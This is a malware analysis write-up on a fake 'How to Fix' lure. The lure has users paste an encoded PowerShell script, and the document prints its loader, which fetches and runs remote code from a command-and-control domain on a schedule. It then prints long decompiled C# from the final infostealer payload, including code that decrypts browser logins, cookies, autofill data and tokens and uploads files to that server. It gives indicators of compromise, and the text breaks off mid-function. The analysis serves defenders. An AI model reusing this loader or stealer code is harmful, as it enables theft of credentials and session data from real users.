Overview: The user encounters a malicious link disguised as a system fix. Upon clicking the “How to Fix” button, the user is prompted to run an encoded PowerShell script via the clipboard. The script employs multiple malicious techniques, such as DNS cache clearing, scheduled jobs for persistence, remote code execution, and clipboard manipulation.
Infection Process:
1. User Interaction:
- Prompt to Fix Issue: The user can click a “How to Fix” button.
- Copying Malicious PowerShell Script: The button copies an encoded PowerShell script to the clipboard, instructing the user to paste and execute it in PowerShell.
2.PowerShell Execution:
- The PowerShell script is obfuscated using Base64 encoding, and the user is tricked into running it.
- After decoding the script, the following actions are taken
Script Breakdown and Analysis:
1. DNS Cache Manipulation:
ipconfig/flushdns- Effect: Clears the DNS cache, which might help remove evidence of previous malicious activities or redirect traffic.
2. Scheduled Job Creation:
Register-ScheduledJob -Name "9a95158" -ScriptBlock {
Write-Output "Now Checking Your DNS Configuration...";
}
$JobPams = @{
Name = "9a95158"
ScriptBlock = {
$GTS = [Environment]::GetFolderPath([Environment+SpecialFolder]::Recent)
$RZS = Get-ChildItem -Path $GTS -Filter "*.normaldaki"
$GLINA = "";
foreach($m in $RZS) {
$GLINA = $m.Name;
}
$g = Invoke-RestMethod -Method Get -Uri https://master.hdsjfkgsadoghdsiougds.space/lumazalupa/chapa.php?id=$GLINA -ContentType application/json -Headers $headers
if ($g.Contains("Comm")) {
$klo = $g.Split("|")[1]
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBse64String($klo)));
}
}
}- Effect: A persistent scheduled job is created, ensuring the script runs every minute. This job checks the DNS configuration and performs remote requests to a potentially malicious server.
3. Environment and File Access:
$GTS = [Environment]::GetFolderPath([Environment+SpecialFolder]::Recent)
$RZS = Get-ChildItem -Path $GTS -Filter "*.normaldaki"- Effect: The script accesses the user’s “Recent” folder and looks for files with the
.normaldakiextension. This could be used to track or manipulate recent user activities.
4. Remote Code Execution via HTTP Request:
$g = Invoke-RestMethod -Method Get -Uri https://master.hdsjfkgsadoghdsiougds.space/api/tu4by3gi -ContentType application/json -Headers $headers- Effect: The script makes an HTTP request to a remote domain, downloading and executing a Base64-encoded payload using:
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBse64String($klo)));This is a common technique for executing arbitrary code from a remote server.
5. Clipboard and UI Manipulation:
Set-Clipboard -Value "";
[System.Windows.Forms.MessageBox]::Show("The operation was completed successfully, try refreshing the page!", "System", 0, 64);- Effect: The script clears the clipboard, potentially removing evidence, and displays a decoy message box to give the appearance of legitimate activity.
Key Malicious Elements:
- DNS Flush: Clears DNS cache to remove evidence of previous malicious activity.
- Scheduled Job Persistence: The script creates a scheduled job that runs indefinitely every minute, maintaining persistence.
- Environment Access: It accesses recent files, which could be used to extract sensitive data.
- HTTP Requests: Fetches malicious content from remote servers for execution.
- Base64 Decoding and Dynamic Code Execution: Executes Base64-encoded scripts, a hallmark of obfuscation techniques used in malware.
- Dynamic Assembly Loading: The script dynamically loads and executes code in memory, avoiding detection by not writing to disk.
- User Decoy: The script presents a decoy message box to trick the user into thinking that a legitimate process has been completed.
Indicators of Compromise (IoCs):
URLs:
- hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/lumazalupa/chapa[.]php?id=$GLINA
- hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/API/tu4by3gi
- hxxps[://]onedrive[.]docx-shaed[.]com/res?a=c&b=&c=0df5e03a-ee47–435e-bcb-6870c214c93
After further investigation into the malicious URLs from the previous PowerShell script, we found that one of the URLs was still active. The URL, hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/api/tu4by3gi , redirected to another Base64-encoded payload. Upon decoding, it revealed an MZ file, indicating a Windows executable (PE) file.
The MZ file was successfully dumped and analyzed. The final payload’s hash was calculated as:
SHA-256 Hash: 6cf1b3a5f0f886f05f1a87c53b83c9e385f7370c7fa058931c9ff8d2a48516c2
The last payload technical analysis :
First function BenzoPilaka:
using System;
using System.Security.Cryptography;
using System.Text;
namespace Ishimsky
{
// Token: 0x02000006 RID: 6
public static class BenzoPilaka
{
// Token: 0x06000003 RID: 3 RVA: 0x0000209C File Offset: 0x0000029C
public static string GDC(string enc, DataProtectionScope dps, byte[] et = null)
{
return Encoding.UTF8.GetString(BenzoPilaka.DCB(Encoding.GetEncoding("windows-1251").GetBytes(enc), dps, et));
}
// Token: 0x06000004 RID: 4 RVA: 0x000020D0 File Offset: 0x000002D0
public static byte[] DCB(byte[] enc, DataProtectionScope dps, byte[] et = null)
{
byte[] result;
try
{
bool flag = enc != null && enc.Length != 0;
if (flag)
{
result = ProtectedData.Unprotect(enc, et, dps);
}
else
{
result = null;
}
}
catch (Exception)
{
result = null;
}
return result;
}
// Token: 0x06000005 RID: 5 RVA: 0x00002120 File Offset: 0x00000320
public static string BUBEL(byte[] b1, byte[] b2)
{
byte[] array = new byte[12];
Array.Copy(b1, 3, array, 0, 12);
byte[] array2 = new byte[b1.Length - 15];
Array.Copy(b1, 15, array2, 0, b1.Length - 15);
byte[] array3 = new byte[16];
Array.Copy(array2, array2.Length - 16, array3, 0, 16);
byte[] array4 = new byte[array2.Length - array3.Length];
Array.Copy(array2, 0, array4, 0, array2.Length - array3.Length);
Cloun cloun = new Cloun();
return Encoding.UTF8.GetString(cloun.DDC(b2, array, null, array4, array3));
}
}
}ProtectedDataAPI: This is part of the .NET Framework and provides data protection using Windows' DPAPI (Data Protection Application Programming Interface). It ensures that only the specified user or machine can decrypt the data.GDCMethod: Appears to be a simple wrapper for decrypting base64-encoded data.BUBELMethod: Deals with more complex manipulation of byte arrays, possibly decrypting some specific encrypted format, and relies on the externalClounclass for decryption.
the second function
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Management;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
using Microsoft.VisualBasic.Devices;
namespace Ishimsky
{
// Token: 0x02000007 RID: 7
internal class Blizkiy
{
// Token: 0x06000006 RID: 6 RVA: 0x000021C0 File Offset: 0x000003C0
public static string BTH(byte[] ba)
{
StringBuilder stringBuilder = new StringBuilder(ba.Length * 2);
foreach (byte b in ba)
{
stringBuilder.AppendFormat("{0:x2}", b);
}
return stringBuilder.ToString();
}
// Token: 0x06000007 RID: 7 RVA: 0x0000220C File Offset: 0x0000040C
public static byte[] ST52(string ToEncrypt)
{
MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider();
byte[] result = md5CryptoServiceProvider.ComputeHash(Encoding.UTF8.GetBytes(ToEncrypt));
md5CryptoServiceProvider.Clear();
return result;
}
// Token: 0x06000008 RID: 8 RVA: 0x00002240 File Offset: 0x00000440
public static string RMCONV(uint klobus)
{
string result;
try
{
result = ((ulong)Math.Round(klobus / 1073741824.0)).ToString();
}
catch
{
result = "0";
}
return result;
}
// Token: 0x06000009 RID: 9 RVA: 0x00002288 File Offset: 0x00000488
public static byte[] DODIK(byte[] encr, string key)
{
TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
tripleDESCryptoServiceProvider.Key = Blizkiy.ST52(key);
tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
tripleDESCryptoServiceProvider.IV = new byte[tripleDESCryptoServiceProvider.BlockSize / 8];
tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateEncryptor();
byte[] result = cryptoTransform.TransformFinalBlock(encr, 0, encr.Length);
tripleDESCryptoServiceProvider.Clear();
return result;
}
// Token: 0x0600000A RID: 10 RVA: 0x000022EC File Offset: 0x000004EC
public static List<string> MOS2(string requs, string orderito, string name)
{
string[] array = requs.Split(new char[]
{
'|'
});
List<string> list = new List<string>();
try
{
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(array[0], array[1]))
{
using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
{
foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
try
{
uint num = Convert.ToUInt32(managementObject[orderito]);
bool flag = num > 0U;
if (flag)
{
list.Add((managementObject[name] as string) + " | " + Blizkiy.RMCONV(num) + "GB");
}
else
{
list.Add(managementObject[name] as string);
}
}
catch (Exception)
{
}
}
}
}
}
catch
{
}
return list;
}
// Token: 0x0600000B RID: 11 RVA: 0x00002430 File Offset: 0x00000630
public static List<string> MOS(string requs, string orderito, string name, string comm)
{
List<string> list = new List<string>();
try
{
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(requs))
{
using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
{
foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
try
{
bool flag = !string.IsNullOrEmpty(name);
if (!flag)
{
list.Add(managementObject[orderito] as string);
return list;
}
string item = string.Concat(new string[]
{
managementObject[orderito] as string,
" | ",
comm,
" ",
Convert.ToString(managementObject[name])
});
list.Add(item);
}
catch
{
}
}
}
}
}
catch
{
}
return list;
}
// Token: 0x0600000C RID: 12 RVA: 0x00002578 File Offset: 0x00000778
public static List<string> ALV()
{
List<string> result = new List<string>();
try
{
return Enumerable.ToList<string>(Enumerable.Select<InputLanguage, string>(Enumerable.Cast<InputLanguage>(InputLanguage.InstalledInputLanguages), (InputLanguage lang) => lang.Culture.EnglishName));
}
catch
{
}
return result;
}
// Token: 0x0600000D RID: 13 RVA: 0x000025E0 File Offset: 0x000007E0
public static string RMA()
{
string result = "";
try
{
ulong totalPhysicalMemory = new ComputerInfo().TotalPhysicalMemory;
result = ((ulong)Math.Round(totalPhysicalMemory / 1073741824.0)).ToString();
}
catch
{
}
return result;
}
// Token: 0x0600000E RID: 14 RVA: 0x0000263C File Offset: 0x0000083C
public static string GWV()
{
try
{
string str;
try
{
str = (Environment.Is64BitOperatingSystem ? "x64" : "x32");
}
catch (Exception)
{
str = "x86";
}
string osfullName = new ComputerInfo().OSFullName;
bool flag = !string.IsNullOrEmpty(osfullName);
if (flag)
{
return osfullName + " " + str;
}
}
catch (Exception)
{
}
return string.Empty;
}
// Token: 0x0600000F RID: 15 RVA: 0x000026C4 File Offset: 0x000008C4
public static Size VDSZ()
{
Size size;
try
{
size = new Computer().Screen.Bounds.Size;
}
catch
{
size = new Computer().Screen.Bounds.Size;
}
return size;
}
}
}BTHMethod (Bytes To Hex):- Purpose: Converts a byte array into its hexadecimal string representation.
- Process: Iterates through each byte, and formats it as a hexadecimal string (
x2), and appends it to aStringBuilder. ST52Method (String to MD5 Hash):- Purpose: Generates an MD5 hash of the input string.
- Process: Takes a string (
ToEncrypt), converts it into a byte array using UTF-8 encoding, and computes its MD5 hash using theMD5CryptoServiceProviderclass. RMCONVMethod (Convert RAM Size):- Purpose: Converts a value representing memory size in bytes to gigabytes (rounded).
- Process: Divide the input size (
klobus) by 1 GB (1073741824 bytes) and rounds the result. If an exception occurs, it returns "0". DODIKMethod (TripleDES Encryption):- Purpose: Encrypts the input byte array (
encr) using TripleDES encryption with a key generated from the provided string (key). - Process: Uses the
TripleDESCryptoServiceProviderclass in ECB (Electronic Codebook) mode with PKCS7 padding to encrypt the data. MOS2Method (Management Object Searcher 2):- Purpose: Queries the system’s management objects using WMI (Windows Management Instrumentation) and returns specific information about hardware or system components.
- Process: Takes a query (
requs), searches for a specific field (orderito), and retrieves its value along with its name (name). If the field contains a size (like disk or memory size), it formats the value in GB. MOSMethod (Management Object Searcher):- Purpose: Similar to
MOS2, but this method allows an additional comment (comm) to be included in the result. - Process: Queries the system for management objects, then returns the value of a specified field (
orderito) concatenated with additional data (commandname). ALVMethod (Available Languages):- Purpose: Retrieves a list of installed input languages on the system.
- Process: Uses the
InputLanguage.InstalledInputLanguagescollection and extracts the English name of each language's culture. RMAMethod (Total RAM):- Purpose: Returns the total amount of physical memory (RAM) installed on the system, converted to gigabytes.
- Process: Uses the
ComputerInfoclass fromMicrosoft.VisualBasic.Devicesto retrieve the total memory and converts it from bytes to gigabytes. GWVMethod (Get Windows Version):- Purpose: Retrieves the full name of the operating system and whether it’s 32-bit or 64-bit.
- Process: Uses the
ComputerInfoclass to get the OS full name and checks if the OS is 64-bit or 32-bit usingEnvironment.Is64BitOperatingSystem. VDSZMethod (Video Display Size):- Purpose: Returns the screen size (resolution) of the current display.
- Process: Uses the
Screen.Bounds.Sizeproperty from theComputerclass to get the screen dimensions.
The 3rd function:
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;
namespace Ishimsky
{
// Token: 0x02000013 RID: 19
internal class Bulkonit
{
// Token: 0x06000058 RID: 88 RVA: 0x00006C78 File Offset: 0x00004E78
public static string SpokiNoki()
{
string text = "";
string[] array = new string[]
{
"",
"E",
"A",
"D",
"F",
"C",
"X",
"Z",
"Q",
"Y"
};
Random random = new Random((int)DateTime.Now.Ticks);
Random random2 = new Random((int)DateTime.Now.Ticks);
for (int i = 0; i <= 15; i++)
{
text = text + array[random.Next(1, 8)] + random2.Next(0, 9).ToString();
}
return text;
}
// Token: 0x06000059 RID: 89 RVA: 0x00006D58 File Offset: 0x00004F58
public static string KadirovskyProspect(string ork)
{
string result;
try
{
ServicePointManager.SecurityProtocol = 3072;
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://master.hdsjfkgsadoghdsiougds.space/mother/" + Bulkonit.SpokiNoki() + "?id=" + ork);
httpWebRequest.AutomaticDecompression = 3;
string text;
using (HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse())
{
using (Stream responseStream = httpWebResponse.GetResponseStream())
{
using (StreamReader streamReader = new StreamReader(responseStream))
{
text = streamReader.ReadToEnd();
}
}
}
result = text;
}
catch
{
result = "";
}
return result;
}
// Token: 0x0600005A RID: 90 RVA: 0x00006E34 File Offset: 0x00005034
public static List<string> Chapap(string text, string key)
{
List<string> list = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(text);
ridik.ReadContextTable("logins");
for (int i = 0; i < ridik.RowLength; i++)
{
string text2 = "";
string text3 = "";
string text4 = "";
string text5 = "";
string text6 = "";
try
{
text2 = ridik.ReadContextValue(i, 0).Trim();
text3 = ridik.ReadContextValue(i, 3).Trim();
text4 = Bulkonit.Mulatka(ridik.ReadContextValue(i, 5), key);
text5 = Bulkonit.WBKT(ridik.ReadContextValue(i, 8).Trim());
text6 = Bulkonit.WBKT(ridik.ReadContextValue(i, 23).Trim());
}
catch (Exception)
{
}
finally
{
bool flag = !string.IsNullOrWhiteSpace(text2);
if (flag)
{
string item = string.Concat(new string[]
{
text2,
"|",
text3,
"|",
text4,
"|",
text5,
"|",
text6
});
list.Add(item);
}
}
}
}
catch (Exception)
{
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005B RID: 91 RVA: 0x00006FEC File Offset: 0x000051EC
public static Tuple<List<string>, List<string>> DaritMolodost(string fil, string key)
{
List<string> list = new List<string>();
List<string> list2 = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(fil);
ridik.ReadContextTable("cookies");
for (int i = 0; i < ridik.RowLength; i++)
{
string text = "";
try
{
bool flag = Convert.ToInt64(ridik.ReadContextValue(i, 7).Trim()) / 1000000L - 11644473600L < 0L;
bool flag2 = flag;
if (flag2)
{
text = string.Concat(new string[]
{
ridik.ReadContextValue(i, 1).Trim(),
"\t",
(ridik.ReadContextValue(i, 1).Trim()[0] == '.').ToString(),
"\t",
ridik.ReadContextValue(i, 6).Trim(),
"\t",
(ridik.ReadContextValue(i, 8)[0] == '1').ToString(),
"\t",
(DateTime.Now.AddMonths(12).Ticks - 621355968000000000L).ToString(),
"\t",
ridik.ReadContextValue(i, 3).Trim(),
"\t",
Bulkonit.Mulatka(ridik.ReadContextValue(i, 5), key)
});
}
else
{
text = string.Concat(new string[]
{
ridik.ReadContextValue(i, 1).Trim(),
"\t",
(ridik.ReadContextValue(i, 1).Trim()[0] == '.').ToString(),
"\t",
ridik.ReadContextValue(i, 6).Trim(),
"\t",
(ridik.ReadContextValue(i, 8)[0] == '1').ToString(),
"\t",
(Convert.ToInt64(ridik.ReadContextValue(i, 7).Trim()) / 1000000L - 11644473600L).ToString(),
"\t",
ridik.ReadContextValue(i, 3).Trim(),
"\t",
Bulkonit.Mulatka(ridik.ReadContextValue(i, 5), key)
});
}
}
catch
{
}
bool flag3 = !string.IsNullOrWhiteSpace(text);
if (flag3)
{
list.Add(text);
bool flag4 = text.Contains("google.");
if (flag4)
{
list2.Add(text);
}
else
{
bool flag5 = text.Contains("youtube.");
if (flag5)
{
list2.Add(text);
}
}
}
}
}
catch
{
}
return Tuple.Create<List<string>, List<string>>(list, list2);
}
catch (Exception)
{
}
return null;
}
// Token: 0x0600005C RID: 92 RVA: 0x00007340 File Offset: 0x00005540
public static List<string> Pidofilio(string pth, string key)
{
List<string> list = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(pth);
ridik.ReadContextTable("autofill");
int i = 0;
while (i < ridik.RowLength)
{
string text = "";
try
{
string text2 = ridik.GatherValue(i, "value").Trim();
bool flag = text2.StartsWith("v10") || text2.StartsWith("v11");
if (flag)
{
text2 = Bulkonit.Mulatka(text2, key);
}
text = ridik.GatherValue(i, "name").Trim() + "|" + text2;
}
catch
{
}
i++;
bool flag2 = !string.IsNullOrWhiteSpace(text);
if (flag2)
{
list.Add(text);
}
}
}
catch (Exception)
{
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005D RID: 93 RVA: 0x00007458 File Offset: 0x00005658
public static List<string> CaptuToto(string pth, string key)
{
List<string> list = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(pth);
ridik.ReadContextTable("token_service");
int i = 0;
while (i < ridik.RowLength)
{
string text = "";
try
{
string text2 = ridik.GatherValue(i, "encrypted_token").Trim();
bool flag = text2.StartsWith("v10") || text2.StartsWith("v11");
if (flag)
{
text2 = Bulkonit.Mulatka(text2, key);
}
text = text2 + ":" + ridik.GatherValue(i, "service").Trim().Split(new char[]
{
'-'
})[1];
}
catch
{
}
i++;
bool flag2 = !string.IsNullOrWhiteSpace(text);
if (flag2)
{
list.Add(text);
}
}
}
catch (Exception)
{
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005E RID: 94 RVA: 0x00007580 File Offset: 0x00005780
public static List<string> CORMAGIDON(string profilePath)
{
List<string> list = new List<string>();
try
{
string text = Path.Combine(profilePath, "Sync Extension Settings");
bool flag = !Directory.Exists(text);
if (flag)
{
return list;
}
foreach (string text2 in ModelGeev.Blagodarnost)
{
string[] array = text2.Split(new char[]
{
'|'
});
bool flag2 = Directory.Exists(Path.Combine(text, array[0]));
if (flag2)
{
list.Add(Path.Combine(text, array[0]) + "|" + array[1]);
}
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005F RID: 95 RVA: 0x00007640 File Offset: 0x00005840
public static List<string> Cerulecus(string prp)
{
List<string> list = new List<string>();
try
{
string text = Path.Combine(prp, "Local Extension Settings");
bool flag = !Directory.Exists(text);
bool flag2 = flag;
if (flag2)
{
return list;
}
foreach (string text2 in ModelGeev.Blagodarnost)
{
string[] array = text2.Split(new char[]
{
'|'
});
bool flag3 = Directory.Exists(Path.Combine(text, array[0]));
if (flag3)
{
list.Add(Path.Combine(text, array[0]) + "|" + array[1]);
}
}
}
catch
{
}
return list;
}
// Token: 0x06000060 RID: 96 RVA: 0x00007704 File Offset: 0x00005904
public static string Mulatka(string chapa, string kiki)
{
string result = string.Empty;
try
{
bool flag = chapa[0] == 'v' && chapa[1] == '1';
if (flag)
{
byte[] array = Convert.FromBase64CharArray(kiki.ToCharArray(), 0, kiki.Length);
Encoding encoding = Encoding.GetEncoding("windows-1251");
byte[] array2 = new byte[array.Length - 5];
Array.Copy(array, 5, array2, 0, array.Length - 5);
byte[] b = BenzoPilaka.DCB(array2, DataProtectionScope.CurrentUser, null);
result = BenzoPilaka.BUBEL(encoding.GetBytes(chapa), b);
}
else
{
result = BenzoPilaka.GDC(chapa, DataProtectionScope.CurrentUser, null).Trim();
}
}
catch (Exception)
{
}
return result;
}
// Token: 0x06000061 RID: 97 RVA: 0x000077C0 File Offset: 0x000059C0
public static string WBKT(string WKE)
{
string result;
try
{
long num = Convert.ToInt64(WKE);
long seconds = (num - 11644473600000000L) / 1000000L;
result = DateTimeOffset.FromUnixTimeSeconds(seconds).UtcDateTime.ToString();
}
catch
{
result = "Null";
}
return result;
}
}
}SpokiNoki:- Generates a random string by combining random letters and numbers from predefined arrays.
KadirovskyProspect:- Makes an HTTP GET request to a specified URL, appending a random string and an ID parameter to the URL, and retrieves the response as a string.
Chapap:- Reads a table named “logins” from a given context, decrypts certain values using a key, and builds a list of strings with processed login data.
DaritMolodost:- Reads a table named “cookies” from a given file, processes, and formats cookie data, and returns two lists: one for general cookies and another for Google or YouTube-related cookies.
Pidofilio:- Reads an “autofill” table, decrypts values if necessary, and returns a list of processed autofill data.
CaptuToto:- Reads a “token_service” table, decrypts tokens if needed, and returns a list of decrypted tokens and associated services.
CORMAGIDON&Cerulecus:- Processes extension settings from profile paths to retrieve specific data related to “Sync” or “Local” extension settings.
Mulatka:- Decrypts a string based on a given key, using either a custom decryption method or Windows Data Protection APIs.
WBKT:- Converts a timestamp from Windows format to a readable date.
The 4th function:
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading;
namespace Ishimsky
{
// Token: 0x02000010 RID: 16
internal class Chechensy
{
// Token: 0x06000044 RID: 68 RVA: 0x00005758 File Offset: 0x00003958
public static void Chernika()
{
for (;;)
{
try
{
Process process = Enumerable.FirstOrDefault<Process>(Process.GetProcesses(), (Process p) => p.ProcessName == "MbaRun");
bool flag = process != null;
if (flag)
{
Environment.Exit(0);
}
Thread.Sleep(50);
}
catch
{
}
}
}
// Token: 0x06000045 RID: 69 RVA: 0x000057CC File Offset: 0x000039CC
public static string Cleaner()
{
try
{
bool flag = File.Exists(ModelGeev.patriarh + ".xexe");
if (flag)
{
File.Delete(ModelGeev.patriarh + ".xexe");
}
bool flag2 = File.Exists(ModelGeev.patriarh + "XE");
if (flag2)
{
File.Delete(ModelGeev.patriarh + "XE");
}
bool flag3 = Directory.Exists(ModelGeev.patriarh);
if (flag3)
{
Directory.Delete(ModelGeev.patriarh, true);
}
}
catch
{
}
return "True";
}
// Token: 0x06000046 RID: 70 RVA: 0x00005878 File Offset: 0x00003A78
public static void Catafalk(string cons, string miklejackson)
{
try
{
WebClient webClient = new WebClient();
webClient.Headers.Add("Content-Type", "binary/octet-stream");
webClient.Headers.Add("TimeStamp", cons);
webClient.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
catch
{
try
{
WebClient webClient2 = new WebClient();
webClient2.Headers.Add("Content-Type", "binary/octet-stream");
webClient2.Headers.Add("TimeStamp", cons);
webClient2.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient2.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
catch
{
try
{
WebClient webClient3 = new WebClient();
webClient3.Headers.Add("Content-Type", "binary/octet-stream");
webClient3.Headers.Add("TimeStamp", cons);
webClient3.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient3.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
catch
{
WebClient webClient4 = new WebClient();
webClient4.Headers.Add("Content-Type", "binary/octet-stream");
webClient4.Headers.Add("TimeStamp", cons);
webClient4.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient4.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
}
}
}
}
}Chernika()Method:- This method continuously checks if a process named “MbaRun” is active. If found, it terminates the program by calling
Environment.Exit(0). This suggests the malware may attempt to evade analysis if specific monitoring tools are running. Cleaner()Method:- Attempts to delete specific files and directories related to
ModelGeev.patriarh. It checks if files with the extensions.xexeandXEexist, deletes them, and then tries to delete theModelGeev.patriarhdirectory. This is likely a cleanup mechanism to remove traces of the malware. Catafalk(string cons, string miklejackson)Method:- This method attempts to upload a file (
miklejackson) to a remote server via a POST request, with headers includingContent-Type, a timestamp (cons), and a cookie (base64-encodedModelGeev.Rukavica). If the upload fails, it retries up to three more times. The repeated use of a URL suggests data exfiltration or communication with a command-and-control (C2) server.
The 5th function:
using System;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Ishimsky
{
// Token: 0x0200000F RID: 15
public class Cloun
{
// Token: 0x0600003D RID: 61 RVA: 0x000054C4 File Offset: 0x000036C4
public byte[] DDC(byte[] key, byte[] iv, byte[] aad, byte[] cipherText, byte[] authTag)
{
IntPtr intPtr = Cloun.OpenAlgorithmProvider("AES", "Microsoft Primitive Provider", "ChainingModeGCM");
IntPtr hKey;
IntPtr hglobal = Cloun.ImportKey(intPtr, key, out hKey);
NaMne.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO bcrypt_AUTHENTICATED_CIPHER_MODE_INFO = new NaMne.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(iv, aad, authTag);
byte[] array2;
using (bcrypt_AUTHENTICATED_CIPHER_MODE_INFO)
{
byte[] array = new byte[Cloun.MaxAuthTagSize(intPtr)];
int num = 0;
uint num2 = NaMne.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, null, 0, ref num, 0);
array2 = new byte[num];
num2 = NaMne.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, array2, array2.Length, ref num, 0);
}
NaMne.BCryptDestroyKey(hKey);
Marshal.FreeHGlobal(hglobal);
NaMne.BCryptCloseAlgorithmProvider(intPtr, 0U);
return array2;
}
// Token: 0x0600003E RID: 62 RVA: 0x00005590 File Offset: 0x00003790
private static int MaxAuthTagSize(IntPtr hAlg)
{
byte[] property = Cloun.GetProperty(hAlg, "AuthTagLength");
return BitConverter.ToInt32(new byte[]
{
property[4],
property[5],
property[6],
property[7]
}, 0);
}
// Token: 0x0600003F RID: 63 RVA: 0x000055D4 File Offset: 0x000037D4
private static IntPtr OpenAlgorithmProvider(string alg, string provider, string chainingMode)
{
IntPtr zero = IntPtr.Zero;
uint num = NaMne.BCryptOpenAlgorithmProvider(out zero, alg, provider, 0U);
byte[] bytes = Encoding.Unicode.GetBytes(chainingMode);
num = NaMne.BCryptSetAlgorithmProperty(zero, "ChainingMode", bytes, bytes.Length, 0);
return zero;
}
// Token: 0x06000040 RID: 64 RVA: 0x00005618 File Offset: 0x00003818
public static byte[] Concat(params byte[][] arrays)
{
byte[] array = new byte[Enumerable.Sum<byte[]>(arrays, (byte[] a) => (a != null) ? a.Length : 0)];
int num = 0;
foreach (byte[] array2 in arrays)
{
bool flag = array2 == null;
if (!flag)
{
Buffer.BlockCopy(array2, 0, array, num, array2.Length);
num += array2.Length;
}
}
return array;
}
// Token: 0x06000041 RID: 65 RVA: 0x00005698 File Offset: 0x00003898
private static IntPtr ImportKey(IntPtr hAlg, byte[] key, out IntPtr hKey)
{
byte[] property = Cloun.GetProperty(hAlg, "ObjectLength");
int num = BitConverter.ToInt32(property, 0);
IntPtr intPtr = Marshal.AllocHGlobal(num);
byte[] array = Cloun.Concat(new byte[][]
{
BitConverter.GetBytes(1296188491),
BitConverter.GetBytes(1),
BitConverter.GetBytes(key.Length),
key
});
uint num2 = NaMne.BCryptImportKey(hAlg, IntPtr.Zero, "KeyDataBlob", out hKey, intPtr, num, array, array.Length, 0U);
return intPtr;
}
// Token: 0x06000042 RID: 66 RVA: 0x00005714 File Offset: 0x00003914
private static byte[] GetProperty(IntPtr hAlg, string name)
{
int num = 0;
uint num2 = NaMne.BCryptGetProperty(hAlg, name, null, 0, ref num, 0U);
byte[] array = new byte[num];
num2 = NaMne.BCryptGetProperty(hAlg, name, array, array.Length, ref num, 0U);
return array;
}
}
}DDC()Method:- This method decrypts data using AES-GCM. It initializes the algorithm provider, imports the key, and performs decryption using the provided ciphertext, key, IV, AAD (Additional Authenticated Data), and authentication tag.
- The method uses Windows Cryptography APIs (
BCryptDecrypt) to decrypt the data and return the plaintext. MaxAuthTagSize()Method:- Retrieves the maximum size of the authentication tag used by the AES-GCM algorithm by querying the algorithm’s properties using
GetProperty(). - It converts the relevant bytes from the result into an integer.
OpenAlgorithmProvider()Method:- Opens a handle to the AES algorithm provider using
BCryptOpenAlgorithmProvider, specifying the chaining mode as GCM. - It sets the chaining mode to GCM by calling
BCryptSetAlgorithmProperty. Concat()Method:- Concatenates multiple byte arrays into a single array. This is useful for constructing a complete data block from different parts like key headers or data segments.
ImportKey()Method:- Imports an AES key into the algorithm provider. It prepares the key as a “KeyDataBlob” and calls
BCryptImportKeyto generate a handle for the imported key. - It returns the memory pointer for the key blob.
GetProperty()Method:- Retrieves a specific property from the algorithm provider, such as the length of the authentication tag or the object length required for the key.
The 6th function:
using System;
using System.Collections.Generic;
using System.IO;
namespace Ishimsky
{
// Token: 0x0200000B RID: 11
internal class FilveM
{
// Token: 0x0600001F RID: 31 RVA: 0x000037B4 File Offset: 0x000019B4
public static List<string> DirTester(string test, string[] file)
{
List<string> list = new List<string>();
FilveM.ptlg = new List<string>();
bool flag = Directory.Exists(test);
if (flag)
{
foreach (string searchPattern in file)
{
try
{
foreach (string text in Directory.GetFiles(test, searchPattern, SearchOption.AllDirectories))
{
string fullName = new FileInfo(text).Directory.FullName;
